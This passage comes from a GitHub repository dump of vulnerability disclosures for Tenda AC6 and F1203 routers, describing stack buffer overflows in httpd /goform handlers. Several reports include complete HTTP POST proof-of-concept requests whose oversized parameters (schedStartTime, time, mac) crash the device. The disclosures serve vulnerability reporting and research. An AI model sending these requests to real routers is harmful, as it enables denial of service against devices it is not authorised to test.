aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

![image-20221118151225120](images/03.png)
/tenda_ac6/setSchedWifi_schedStartTime/setSchedWifi_schedStartTime.md:
--------------------------------------------------------------------------------

# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the schedStartTime parameter in the setSchedWifi function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/openSchedWifi` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/openSchedWifi` page. The details are shown below:

![image-20221119104411836](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.204.133
Content-Length: 2082
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

schedWifiEnable=0&schedStartTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/setSmartPowerManagement/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSmartPowerManagement/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/setSmartPowerManagement/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSmartPowerManagement/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/setSmartPowerManagement/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/setSmartPowerManagement/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/setSmartPowerManagement/setSmartPowerManagement.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the setSmartPowerManagement function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/PowerSaveSet` request. 
## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/PowerSaveSet` page. The details are shown below:

![image-20221119100455243](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/PowerSaveSet HTTP/1.1
Host: 192.168.204.133
Content-Length: 1380
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6v1.0_vuln/Tenda AC6V1.0 V15.03.05.19 Stack overflow vulnerability.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 Stack overflow vulnerability 2 | 3 | ## Firmware information 4 | 5 | * Manufacturer's address: https://www.tenda.com.cn/ 6 | 7 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 8 | 9 | ## Affected version 10 | 11 | ![](images/01.png) 12 | 13 | ## 
Vulnerability details

This vulnerability lies in the `/goform/WifiBasicSet` page. While processing the `security` parameter of a POST request, the value is copied directly with `strcpy` into a local variable placed on the stack, which overwrites the return address of the function, causing a buffer overflow. The details are shown below:

![image-20221117163921726](images/04.png)

![image-20221117162857193](images/3.png)

![image-20221117162540617](images/02.png)

## POC

This PoC can result in a DoS.

![image-20221117164219291](images/05.png)

![image-20221117164300400](images/06.png)
--------------------------------------------------------------------------------
/tenda_f1203/GetParentControlInfo/GetParentControlInfo.md:
--------------------------------------------------------------------------------

# Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the mac parameter in the GetParentControlInfo function.

## Description

`Tenda` Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/GetParentControlInfo` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2494.html

## Affected version

![image-20221201234503984](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/GetParentControlInfo` page. The details are shown below:

![image-20221201235217239](images/02.png)

## POC

This POC can result in a DoS.
26 | 27 | ``` 28 | POST /goform/GetParentControlInfo HTTP/1.1 29 | Host: 192.168.204.143 30 | Cache-Control: max-age=0 31 | Upgrade-Insecure-Requests: 1 32 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 34 | Accept-Encoding: gzip, deflate 35 | Accept-Language: zh-CN,zh;q=0.9 36 | Cookie: user=admin 37 | Connection: close 38 | Content-Length: 2055 39 | 40 | mac=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 41 | ``` 42 | 43 | ![image-20221201234916364](images/03.png) -------------------------------------------------------------------------------- /tenda_f1203/GetParentControlInfo/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/GetParentControlInfo/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/GetParentControlInfo/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/GetParentControlInfo/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/GetParentControlInfo/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/GetParentControlInfo/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/addWifiMacFilter_deviceId/images/01.png: -------------------------------------------------------------------------------- 
--------------------------------------------------------------------------------
/tenda_f1203/formWriteFacMac/formWriteFacMac.md:
